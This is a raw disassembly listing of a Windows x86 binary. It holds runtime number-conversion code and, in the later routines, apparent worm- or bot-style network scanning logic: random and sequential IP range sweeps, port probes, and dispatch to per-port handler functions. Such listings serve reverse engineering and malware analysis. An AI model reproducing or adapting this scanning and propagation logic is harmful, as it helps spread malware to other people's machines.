xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411FF3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F7B
; ---------------------------------------------------------------------------
loc_411F76: ; CODE XREF: sub_411EAB+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411F7B: ; CODE XREF: sub_411EAB+C9�j
jnz short loc_411F85
inc eax
cmp eax, 3
jl short loc_411F76
jmp short loc_411FF3
; ---------------------------------------------------------------------------
loc_411F85: ; CODE XREF: sub_411EAB:loc_411F7B�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411F9F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411F9F: ; CODE XREF: sub_411EAB+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411FDE
cmp [ebp+arg_0], edx
jmp short loc_411FDC
; ---------------------------------------------------------------------------
loc_411FC1: ; CODE XREF: sub_411EAB+143�j
test ecx, ecx
jz short loc_411FF0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411FDE
cmp esi, 1
loc_411FDC: ; CODE XREF: sub_411EAB+114�j
jnb short loc_411FE5
loc_411FDE: ; CODE XREF: sub_411EAB+10F�j
; sub_411EAB+12C�j
mov [ebp+var_4], 1
loc_411FE5: ; CODE XREF: sub_411EAB:loc_411FDC�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411FC1
loc_411FF0: ; CODE XREF: sub_411EAB+118�j
mov [ebp+arg_0], ecx
loc_411FF3: ; CODE XREF: sub_411EAB+B5�j
; sub_411EAB+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412013
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412013: ; CODE XREF: sub_411EAB+159�j
cmp [ebp+arg_0], 0
jz short loc_41201A
inc ebx
loc_41201A: ; CODE XREF: sub_411EAB+16C�j
mov eax, dword_42424C
mov ecx, eax
sub ecx, dword_424250
cmp ebx, ecx
jge short loc_412038
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_412245
; ---------------------------------------------------------------------------
loc_412038: ; CODE XREF: sub_411EAB+17E�j
cmp ebx, eax
jg loc_41224F
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412066
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412066: ; CODE XREF: sub_411EAB+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412081: ; CODE XREF: sub_411EAB+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412081
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4120BB: ; CODE XREF: sub_411EAB+227�j
cmp edx, eax
jl short loc_4120C7
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120CC
; ---------------------------------------------------------------------------
loc_4120C7: ; CODE XREF: sub_411EAB+212�j
and [ebp+edx*4+var_20], 0
loc_4120CC: ; CODE XREF: sub_411EAB+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4120BB
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4120FB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120FB: ; CODE XREF: sub_411EAB+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412196
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_412126
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_411EAB+281�j
cmp [ebp+eax*4+var_20], 0
loc_412126: ; CODE XREF: sub_411EAB+274�j
jnz short loc_412130
inc eax
cmp eax, 3
jl short loc_412121
jmp short loc_412196
; ---------------------------------------------------------------------------
loc_412130: ; CODE XREF: sub_411EAB:loc_412126�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41214A
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41214A: ; CODE XREF: sub_411EAB+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412166
cmp edi, edx
jnb short loc_41216D
loc_412166: ; CODE XREF: sub_411EAB+2B5�j
mov [ebp+arg_0], 1
loc_41216D: ; CODE XREF: sub_411EAB+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412193
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_411EAB+2E9�j
test ecx, ecx
jz short loc_412196
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41218C
cmp esi, 1
jnb short loc_41218F
loc_41218C: ; CODE XREF: sub_411EAB+2DA�j
xor edi, edi
inc edi
loc_41218F: ; CODE XREF: sub_411EAB+2DF�j
mov [ecx], esi
mov ecx, edi
loc_412193: ; CODE XREF: sub_411EAB+2C7�j
dec eax
jns short loc_412174
loc_412196: ; CODE XREF: sub_411EAB+263�j
; sub_411EAB+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4121B6
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4121B6: ; CODE XREF: sub_411EAB+2FC�j
mov ecx, dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121D7
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121D7: ; CODE XREF: sub_411EAB+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4121F2: ; CODE XREF: sub_411EAB+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4121F2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41222C: ; CODE XREF: sub_411EAB+398�j
cmp edx, eax
jl short loc_412238
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412238: ; CODE XREF: sub_411EAB+383�j
and [ebp+edx*4+var_20], 0
loc_41223D: ; CODE XREF: sub_411EAB+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41222C
loc_412245: ; CODE XREF: sub_411EAB+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41224F: ; CODE XREF: sub_411EAB+18F�j
cmp ebx, dword_424248
mov ecx, dword_424254
jl loc_41230E
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41228A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41228A: ; CODE XREF: sub_411EAB+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4122A5: ; CODE XREF: sub_411EAB+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4122A5
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4122DF: ; CODE XREF: sub_411EAB+44B�j
cmp edx, eax
jl short loc_4122EB
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4122F0
; ---------------------------------------------------------------------------
loc_4122EB: ; CODE XREF: sub_411EAB+436�j
and [ebp+edx*4+var_20], 0
loc_4122F0: ; CODE XREF: sub_411EAB+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4122DF
mov eax, dword_424248
mov ecx, dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41230E: ; CODE XREF: sub_411EAB+3B0�j
mov eax, dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412336
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412336: ; CODE XREF: sub_411EAB+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412351: ; CODE XREF: sub_411EAB+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412351
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41238E: ; CODE XREF: sub_411EAB+4FA�j
cmp edx, eax
jl short loc_41239A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41239F
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_411EAB+4E5�j
and [ebp+edx*4+var_20], 0
loc_41239F: ; CODE XREF: sub_411EAB+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41238E
xor eax, eax
loc_4123A9: ; CODE XREF: sub_411EAB+39F�j
; sub_411EAB+45E�j
pop esi
loc_4123AA: ; CODE XREF: sub_411EAB+55�j
; sub_411EAB+65�j
push 1Fh
pop ecx
sub ecx, dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_4123DF
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_4123E9
; ---------------------------------------------------------------------------
loc_4123DF: ; CODE XREF: sub_411EAB+525�j
cmp ecx, 20h
jnz short loc_4123E9
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_4123E9: ; CODE XREF: sub_411EAB+532�j
; sub_411EAB+537�j
pop edi
pop ebx
leave
retn
sub_411EAB endp
; [00000691 BYTES: COLLAPSED FUNCTION ___strgtold12_l. PRESS KEYPAD "+" TO EXPAND]
db 8Dh, 49h, 0
off_412A81 dd offset $LN119 ; DATA XREF: ___strgtold12_l+91�r
dd offset $LN108 ; jump table for switch statement
dd offset $LN97
dd offset $LN88
dd offset $LN75
dd offset $LN61
dd offset $LN58
dd offset $LN43_0
dd offset $LN49_0
dd offset $LN36_2
dd offset $LN257
dd offset $LN28_2
; [000008C8 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [000000A0 BYTES: COLLAPSED FUNCTION ___hw_cw_sse2. PRESS KEYPAD "+" TO EXPAND]
; [00000303 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [000001CC BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413976 proc near ; CODE XREF: unknown_libname_9+24�p
; _EH4_GlobalUnwind(x)+10�p ...
jmp ds:dword_41D1B0
sub_413976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41397C proc near ; CODE XREF: sub_413A2D+14B�p
; sub_413A2D+271�p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D27C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4139AD
xor al, al
jmp short loc_413A1F
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_41397C+2B�j
push [ebp+arg_4]
call ds:dword_41D278 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268 ; ioctlsocket
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D240 ; connect
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D258 ; select
push esi
mov edi, eax
call ds:dword_41D224 ; closesocket
test edi, edi
setnle al
loc_413A1F: ; CODE XREF: sub_41397C+2F�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_41397C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_413A2D proc near ; DATA XREF: sub_401F1C+4E3�o
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
Dest = byte ptr -240h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_130 = byte ptr -130h
var_30 = byte ptr -30h
var_20 = byte ptr -20h
var_1E = byte ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, dword_423064
xor eax, esp
mov [esp+25Ch+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 49h
pop ecx
lea edi, [esp+268h+var_130]
rep movsd
loc_413A59: ; CODE XREF: sub_413A2D+544�j
; sub_413A2D+555�j
lea eax, [esp+268h+var_250]
push eax
lea eax, [esp+26Ch+var_254]
push eax
lea eax, [esp+270h+var_258]
push eax
lea eax, [esp+274h+var_25C]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+278h+var_30]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax ; char *
mov [esp+280h+var_25C], edi
mov [esp+280h+var_258], edi
mov [esp+280h+var_254], edi
mov [esp+280h+var_250], edi
call _sscanf
add esp, 18h
cmp [esp+268h+var_1E], 0
jz short loc_413AE7
cmp [esp+268h+var_25C], edi
mov esi, 0FEh
jnz short loc_413AB7
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_25C], eax
loc_413AB7: ; CODE XREF: sub_413A2D+7B�j
cmp [esp+268h+var_258], edi
jnz short loc_413ACA
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_258], eax
loc_413ACA: ; CODE XREF: sub_413A2D+8E�j
cmp [esp+268h+var_254], edi
jnz short loc_413ADD
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_254], eax
loc_413ADD: ; CODE XREF: sub_413A2D+A1�j
mov eax, [esp+268h+var_250]
cmp eax, edi
jnz short loc_413B39
jmp short loc_413B12
; ---------------------------------------------------------------------------
loc_413AE7: ; CODE XREF: sub_413A2D+70�j
mov eax, [esp+268h+var_18]
sub eax, 0
jz short loc_413B21
dec eax
jz short loc_413B00
dec eax
jnz short loc_413B35
mov eax, 0FEh
jmp short loc_413B14
; ---------------------------------------------------------------------------
loc_413B00: ; CODE XREF: sub_413A2D+C7�j
mov esi, 0FEh
loc_413B05: ; CODE XREF: sub_413A2D+106�j
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_254], eax
loc_413B12: ; CODE XREF: sub_413A2D+B8�j
mov eax, esi
loc_413B14: ; CODE XREF: sub_413A2D+D1�j
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_250], eax
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B21: ; CODE XREF: sub_413A2D+C4�j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_258], eax
jmp short loc_413B05
; ---------------------------------------------------------------------------
loc_413B35: ; CODE XREF: sub_413A2D+CA�j
mov eax, [esp+268h+var_250]
loc_413B39: ; CODE XREF: sub_413A2D+B6�j
; sub_413A2D+F2�j
shl eax, 8
add eax, [esp+268h+var_254]
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
mov [esp+268h+var_14], eax
mov eax, [esp+268h+var_1C]
cmp eax, edi
jnz loc_413D78
xor ebx, ebx
mov [esp+268h+var_248], ebx
mov eax, offset dword_424548
loc_413B6F: ; CODE XREF: sub_413A2D+169�j
push dword ptr [eax]
push [esp+26Ch+var_14]
call sub_41397C
test al, al
pop ecx
pop ecx
jnz short loc_413B9D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+268h+var_248], ebx
jnz short loc_413B6F
jmp loc_413F62
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: sub_413A2D+154�j
push 110h ; size_t
lea eax, [esp+26Ch+Dest]
push 0 ; int
push eax ; void *
call _memset
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_0 ; "%s"
lea eax, [esp+270h+Dest]
push 0FFh ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+278h+Dest]
add esp, 10h
lea esi, [eax+1]
loc_413BD7: ; CODE XREF: sub_413A2D+1AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413BD7
sub eax, esi
mov [esp+eax+268h+Dest], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_140], ebx
imul ebx, 2Ch
mov [esp+268h+var_13C], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+Dest]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_250]
shl esi, 8
add esi, [esp+378h+var_254]
add esp, 110h
shl esi, 8
add esi, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl esi, 8
add esi, [esp+268h+var_25C]
mov [esp+268h+var_244], esi
loc_413C70: ; CODE XREF: sub_413A2D+340�j
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, esi
mov [esp+268h+var_14], eax
jz loc_413D5D
push dword_424548[ebx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413D5D
push 110h ; size_t
lea eax, [esp+26Ch+Dest]
push 0 ; int
push eax ; void *
call _memset
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_1 ; "%s"
lea eax, [esp+270h+Dest]
push 0FFh ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+278h+Dest]
add esp, 10h
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: sub_413A2D+2BF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov [esp+eax+268h+Dest], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_248]
mov [esp+268h+var_140], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+Dest]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_244]
add esp, 110h
loc_413D5D: ; CODE XREF: sub_413A2D+264�j
; sub_413A2D+27A�j
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_413C70
jmp loc_413F5D
; ---------------------------------------------------------------------------
loc_413D78: ; CODE XREF: sub_413A2D+131�j
imul eax, 2Ch
push dword_424548[eax]
push [esp+26Ch+var_14]
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F62
push 110h ; size_t
lea eax, [esp+26Ch+Dest]
push 0 ; int
push eax ; void *
call _memset
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_2 ; "%s"
lea eax, [esp+270h+Dest]
push 0FFh ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+278h+Dest]
add esp, 10h
lea ecx, [eax+1]
loc_413DD1: ; CODE XREF: sub_413A2D+3A9�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DD1
sub eax, ecx
mov [esp+eax+268h+Dest], dl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+Dest]
mov edi, esp
rep movsd
call off_424550[eax]
mov ebx, [esp+378h+var_250]
shl ebx, 8
add ebx, [esp+378h+var_254]
add esp, 110h
shl ebx, 8
add ebx, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl ebx, 8
add ebx, [esp+268h+var_25C]
loc_413E5F: ; CODE XREF: sub_413A2D+52A�j
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, ebx
mov [esp+268h+var_14], eax
jz loc_413F47
mov ecx, [esp+268h+var_1C]
imul ecx, 2Ch
push dword_424548[ecx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F47
push 110h ; size_t
lea eax, [esp+26Ch+Dest]
push 0 ; int
push eax ; void *
call _memset
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_3 ; "%s"
lea eax, [esp+270h+Dest]
push 0FFh ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+278h+Dest]
add esp, 10h
lea esi, [eax+1]
loc_413EE0: ; CODE XREF: sub_413A2D+4B8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EE0
sub eax, esi
mov [esp+eax+268h+Dest], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+Dest]
mov edi, esp
rep movsd
call off_424550[eax]
add esp, 110h
loc_413F47: ; CODE XREF: sub_413A2D+453�j
; sub_413A2D+473�j
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_413E5F
loc_413F5D: ; CODE XREF: sub_413A2D+346�j
call sub_4192FB
loc_413F62: ; CODE XREF: sub_413A2D+16B�j
; sub_413A2D+364�j
push 64h
call ds:dword_41D0FC ; Sleep
cmp byte_4269C0, 0
jnz loc_413A59
push 2710h
call ds:dword_41D0FC ; Sleep
jmp loc_413A59
sub_413A2D endp
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8F proc near ; CODE XREF: sub_414023+12�p
; sub_414042+5D�p
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, dword_433C4C
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_433C48
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_413FB0: ; CODE XREF: sub_413F8F+4C�j
mov eax, dword_433C4C
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_414018
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_413FDD
call sub_40168C
jmp short loc_413FB0
; ---------------------------------------------------------------------------
loc_413FDD: ; CODE XREF: sub_413F8F+45�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, dword_433C4C
jz short loc_414018
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax ; Memory
mov [ecx+4], edx
call j__free
dec dword_433C50
pop ecx
loc_414018: ; CODE XREF: sub_413F8F+36�j
; sub_413F8F+6B�j
push ebx ; Memory
call j__free
pop ecx
pop edi
pop esi
leave
retn
sub_413F8F endp
; =============== S U B R O U T I N E =======================================
sub_414023 proc near ; CODE XREF: sub_40243A+7C�p
; sub_419477+10B�p
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:dword_41D094 ; TerminateThread
test eax, eax
jz short loc_41403E
call sub_413F8F
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41403E: ; CODE XREF: sub_414023+10�j
xor al, al
pop ebx
retn
sub_414023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414042 proc near ; CODE XREF: sub_419EA0+4D2�p
; sub_41B925+240�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, dword_433C4C
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_433C48
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414066: ; CODE XREF: sub_414042+54�j
mov eax, dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4140A4
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414098
lea edi, [esp+28h+var_8]
call sub_40168C
